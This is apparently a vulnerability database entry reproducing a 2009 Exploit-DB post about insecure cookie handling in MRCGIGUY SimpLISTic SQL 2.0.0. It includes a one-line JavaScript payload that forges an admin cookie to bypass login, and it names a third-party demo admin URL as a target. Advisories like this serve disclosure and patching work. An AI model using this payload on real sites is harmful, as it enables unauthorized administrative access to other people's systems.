MRCGIGUY SimpLISTic SQL 2.0.0 Insecure Cookie Handling

vendor:

SimpLISTic SQL

by:

ThE g0bL!N

7,5

CVSS

HIGH

Insecure Cookie Handling

CWE

Product Name: SimpLISTic SQL

Affected Version From: 2.0.0

Affected Version To: 2.0.0

Patch Exists: NO

Related CWE: N/A

CPE: a:mrcgiguy:simplectic_sql:2.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

MRCGIGUY SimpLISTic SQL 2.0.0 Insecure Cookie Handling

A vulnerability in MRCGIGUY SimpLISTic SQL 2.0.0 allows an attacker to inject a malicious cookie into the application. The malicious cookie can be used to gain access to the application without authentication. The exploit code is a JavaScript code that sets a cookie with the value 'logged in' and the path '/'.

Mitigation:

Ensure that all cookies are properly validated and sanitized before being used in the application.

Source

Exploit-DB raw data:

---------------------------------------------------------------
---------------------------------------------------------------
MRCGIGUY SimpLISTic SQL 2.0.0 Insecure Cookie Handling
---------------------------------------------------------------
Founder :ThE g0bL!N
Home:http://www.mrcgiguy.com
MRCGIGUY SimpLISTic SQL 2.0.0
---------------------------------------------------------------
Exploit
-------
javascript:document.cookie="amazonadmin=logged in;path=/";
----------------------------------------------------------------
Dem0
----
http://www.myhotlinks.net/cgi-bin/simp2/admin.cgi
--------------------------------------
Greeting To ALL My Friends (Dz)

# milw0rm.com [2009-05-14]